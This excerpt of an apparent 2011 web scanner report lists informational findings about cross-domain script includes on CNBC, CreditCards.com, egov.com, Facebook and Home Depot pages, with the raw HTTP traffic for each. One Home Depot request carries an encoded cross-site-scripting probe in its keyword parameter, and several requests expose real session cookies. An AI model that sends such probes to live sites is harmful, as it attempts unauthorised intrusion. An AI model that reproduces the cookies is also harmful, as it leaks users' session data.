<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

16.72. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel
http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

Request

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2108
Content-Type: text/html
Date: Fri, 17 Jun 2011 10:13:06 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://admeld.adnxs.com/usersync?calltype=admeld&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>
...[SNIP]...

16.73. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel
http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match

Request

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 2090
Content-Type: text/html
Date: Thu, 16 Jun 2011 12:20:13 GMT
Connection: close

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...
<div style="width:0;height:0">

<script type="text/javascript" src="http://a.tribalfusion.com/j.ad?site=admeldae&adSpace=audienceselect&size=1x1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=10&admeld_callback=http://tag.admeld.com/pixel"></script>
...[SNIP]...
</iframe>

<script type="text/javascript" src="http://pixel.invitemedia.com/admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...

16.74. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/creditcards/venture-one-rewards-credit-card/11858/15/

Issue detail

The response dynamically includes the following script from another domain:

http://switch.atdmt.com/jaction/COCC_WS_VentureOneRewards/v3/atz.FB8DCF93533EFDA4/atc1.11858/atc4.15

Request

Response

16.75. http://www.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js?rti=201008
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc8sw%2fTFdw%2bInzeR9sZPbv%2bqvR3fNM6J0OXrmYeWauZ3E%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3YuAq63wy+X4=; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 11:24:44 GMT
Via: 1.1 C aicache6
Content-Length: 222020
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 01 Jan 1970 00:00:00 GMT

<html class="cnbc_html"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Find the latest stock market news, information & headlines. Get u
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=201008"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

16.76. http://www.cnbc.com/id/43422860 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/43422860

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.msn.com/library/dap.js?rti=201008
http://s7.addthis.com/js/152/addthis_widget.js
http://www.nbcudigitaladops.com/hosted/global.js
http://www.nbcudigitaladops.com/hosted/global_header.js

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcgEdRxwdvCWSr%2f7fIsAY2%2b%2bQziygfeZY8BKoov1vM6pY%3d; path=/
Set-Cookie: cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSUK5p/6Fy9H3cNUyzTRFJJY=; path=/
Set-Cookie: cnbcCommentsAuthKeyCookie=2mIILitmqpa%2fV%2bV1oNF%2f%2fturo0ZxZ6xx7ALHd%2bt5uqfJGXLApsKQ2NtZdLvVcjbR56DOITjy6c466EIXOSSo%2f6MkoytxM7f0miPeiNE4Qig%3d; path=/
X-Powered-By: ASP.NET
Date: Thu, 16 Jun 2011 12:10:02 GMT
Via: 1.1 C aicache6
Content-Length: 145404
X-Aicache-OS: 65.55.53.237:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Thu, 16 Jun 2011 12:10:08 GMT

<html class="cnbc_html" xmlns:tvservices="http://www.msnbc.com"><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta http-equiv="pics-label" content="(pics-1.1 "http://w
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.msn.com/library/dap.js?rti=201008"></script>
...[SNIP]...
<body leftmargin="0" topmargin="0" class="cnbc"><script src="http://www.nbcudigitaladops.com/hosted/global_header.js" language="JavaScript"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script><script src="http://www.nbcudigitaladops.com/hosted/global.js" language="JavaScript"></script>
...[SNIP]...

16.77. http://www.creditcards.com/0-apr-credit-cards.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/0-apr-credit-cards.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /0-apr-credit-cards.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_cc=true; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; CCsCookieimp=1308307185; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307192206%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253Dhome%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/0-apr-credit-cards.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:39:51 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43198

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>0% APR Credit Cards: Apply Now - CreditCards.com</title>
<meta name="
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.78. http://www.creditcards.com/instant-approval.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.creditcards.com
Path:	/instant-approval.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.bkrtx.com/js/bk-static.js

Request

GET /instant-approval.php HTTP/1.1
Host: www.creditcards.com
Proxy-Connection: keep-alive
Referer: http://www.creditcards.com/0-apr-credit-cards.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSSC=3.49665759.60098554.232.9134; Apache=66.219.46.81.1308307164223285; PHPSESSID=692d79b5d2c14b1bb951d0915e57c36b; CCCID=173.193.214.243_20110617053924_f5fd4d9c; ACTREF=692d79b5d2c14b1bb951d0915e57c36b_999__201106170539; CURRREF=999; SSBAL=node.web1; s_vi=[CS]v1|26FD9772051603E8-60000177A00CCF03[CE]; s_cc=true; CCsCookieimp=1308307229; s_cpm=%5B%5B%27999-0-0-0%27%2C%271308307269913%27%5D%5D; s_sq=ccardsccdc-us%3D%2526pid%253DTYPE%25253A0-apr-credit-cards%2526pidt%253D1%2526oid%253Dhttp%25253A//www.creditcards.com/instant-approval.php%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Fri, 17 Jun 2011 10:42:46 GMT
Server: Apache
Expires: Fri, 09 Jul 2010 22:45:02 GMT
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 43965

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Instant Approval Credit Cards - CreditCards.com</title>
<meta name="k
...[SNIP]...
</iframe>
<script type="text/javascript" src="http://www.bkrtx.com/js/bk-static.js"></script>
...[SNIP]...

16.79. http://www.egov.com/Pages/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Pages/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1
http://s7.addthis.com/js/250/addthis_widget.js
http://script.footprintlive.com/?site=nicusa.com

Request

GET /Pages/default.aspx HTTP/1.1
Host: www.egov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 34100
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jun 2011 11:15:47 GMT
Last-Modified: Thu, 16 Jun 2011 11:15:47 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:15:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir=
...[SNIP]...
</a><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=nicusa"></script>
...[SNIP]...


<script src="http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://script.footprintlive.com/?site=nicusa.com"></script>
...[SNIP]...

16.80. http://www.egov.com/Solutions/Funding/Pages/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Solutions/Funding/Pages/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1
http://script.footprintlive.com/?site=nicusa.com

Request

GET /Solutions/Funding/Pages/default.aspx HTTP/1.1
Host: www.egov.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101190805.1308222957.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=101190805.1092562421.1308222957.1308222957.1308222957.1; __utmc=101190805; __utmb=101190805.1.10.1308222957; machine-id=173.193.214.243%3A1308222952703; _ots=1.1308222952703.1308222952703.1308222952703; _otui=2026483286.1308222952703.1308222952703.1308222952703.1.1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 50272
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jun 2011 11:16:00 GMT
Last-Modified: Thu, 16 Jun 2011 11:16:00 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:16:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir=
...[SNIP]...


<script src="http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://script.footprintlive.com/?site=nicusa.com"></script>
...[SNIP]...

16.81. http://www.egov.com/Solutions/Pages/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.egov.com
Path:	/Solutions/Pages/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1
http://script.footprintlive.com/?site=nicusa.com

Request

GET /Solutions/Pages/default.aspx HTTP/1.1
Host: www.egov.com
Proxy-Connection: keep-alive
Referer: http://www.egov.com/Solutions/Funding/Pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=101190805.1308222957.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); machine-id=173.193.214.243%3A1308222952703; __utma=101190805.1092562421.1308222957.1308222957.1308222957.1; __utmc=101190805; __utmb=101190805.2.10.1308222957; _ots=2.1308222952703.1308222952703.1308222952703; _otui=2026483286.1308222952703.1308222952703.1308222952703.1.2

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 50788
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jun 2011 11:25:08 GMT
Last-Modified: Thu, 16 Jun 2011 11:25:08 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6529
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Thu, 16 Jun 2011 11:25:09 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">

<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir=
...[SNIP]...


<script src="http://platform.twitter.com/anywhere.js?id=FCLeDn4NQTLShRq2YWC7mw&v=1" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://script.footprintlive.com/?site=nicusa.com"></script>
...[SNIP]...

16.82. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/H7He8TCHOS8.js
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js
http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js

Request

Response

16.83. http://www.facebook.com/plugins/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js

Request

Response

16.84. http://www.facebook.com/widgets/recommendations.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/widgets/recommendations.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js

Request

Response

16.85. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/afsonline/show_afs_ads.js
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?storeId=10051&catalogId=10053&langId=-1&style=A&rpp=96 HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation?Ns=P_REP_PRC_MODE%7C1&storeId=10051&catalogId=10053&langId=-1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85e5b7-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; THD_CACHE_NAV_PERSIST=C10%7e24%5f%7eC10%5fEXP%7e; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=oDMMetInv1iHYp16kefFhsmzBsk%3d%0a%3b2011%2d06%2d16+07%3a26%3a40%2e59%5f1308223600358%2d3348%5f10051; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; THD_SESSION=C1%3D5%3A%3BC1_EXP%3D-1%3A%3BC6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308223792094%3a%3bC25%5fEXP%3d1360063792%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; WC_USERSESSION_-1002=%2d1002%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002025830%5d%2c84UkZ5wI%2fVfXz0TN8b05L8WU9Mc%3d; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=4; s_pers=%20s_campaign%3Dno%2520value%7C1308225658356%3B%20s_prevPage%3Doutdoors%253Eoutdoor%2520power%2520equipment%253Eriding%2520mowers%253Egas%2520riding%2520mowers%7C1308225658360%3B%20p_30%3DSubcategory%7C1308225658363%3B; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20s_cc%3Dtrue%3B%20s_cmpnm%3Dundefined%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

16.86. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.homedepot.com
Path:	/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.google.com/afsonline/show_afs_ads.js
https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js

Request

GET /Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation?langId=-1&storeId=10051&catalogId=10053&Nu=P_PARENT_ID&searchNav=true&keyword=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x0000AB%2529%253C%252Fscript%253E&omni=3&selectedCatgry=SEARCH+ALL HTTP/1.1
Host: www.homedepot.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Coradiantuserid=6a85ca6f-5df4-1ce7-9678-00e0ed194bfc; WCSSESSIONID=0000jER3-5yFhPoxRUM36EntY2Q:12a39ak21; WC_SESSION_ESTABLISHED=true; WC_ACTIVESTOREDATA=%2d1%2c10051; NSC_mc-wt-qs-80-w1-psjhjo-xxx2=ffffffffc3a00a0445525d5f4f58455e445a4a422991; s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; WCS_UNIQUE_ID=pj2%2fAbKo0hioCIjy%2fGZIbghyakk%3d%0a; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_SESSION=C11%7eN%5f%7eC11%5fEXP%7e%5f%7eC20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e%5f%7eC26%7eP%5fREP%5fPRC%5fMODE%7c1%5f%7eC26%5fEXP%7e; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=pW%2fGae6D3LGDcDHOSB435JQQfgM%3d%0a%3b2011%2d06%2d16+07%3a33%3a50%2e14%5f1308223600358%2d3348%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_SESSION=C1%3d5%3a%3bC1%5fEXP%3d%2d1; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360063600%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360063600%3a%3bC6%3d%7b%22I1%22%3a%223%22%2c%22F1%22%3a%22true%22%2c%22F2%22%3a%22true%22%2c%22D1%22%3a%22%245%2c197%2e00%22%2c%22D2%22%3a%22%240%2e00%22%7d%3a%3bC6%5fEXP%3d1310816133%3a%3bC8%3d%3a%3bC8%5fEXP%3d1308310168%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360063600%3a%3bC25%3dccaita67%2fWC%5fTHD2%5fccaita67%2f1308224138370%3a%3bC25%5fEXP%3d1360064138%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360063600%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360063600%3a%3bC34%3d1%2e0%2d2%2e1%2d3%2e0%2d4%2e0%2d5%2e0%3a%3bC34%5fEXP%3d1308310000; WC_USERSESSION_287408220=287408220%2c%2d1%2cUSD%2c%2d2000%2cnull%2cnull%2cnull%2c1308227738451%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c2025831%3b2081191%7c2025831%3b2081191%7cnull%7c7000000000002081190%5d%2ckQjrscmhQuxLSR9cYv9SV7c0668%3d; s_pers=%20s_scOpen%3D1%7C1308225942967%3B%20s_campaign%3Dno%2520value%7C1308225943059%3B%20s_prevPage%3Dproductdetails%7C1308225943066%3B%20p_30%3DPIP%7C1308225943073%3B; RES_SESSIONID=273436009418219; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=6; s_sess=%20s_v2%3Doutdoor_power_equipment-_-modal_overlayB-_-product2-_-gas_riding_mowers%3B%20p_v62%3Dnon-major%2520appliance%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server/2.0.47.1-PK65782 Apache/2.0.47 (Unix)
Surrogate-Control: no-store
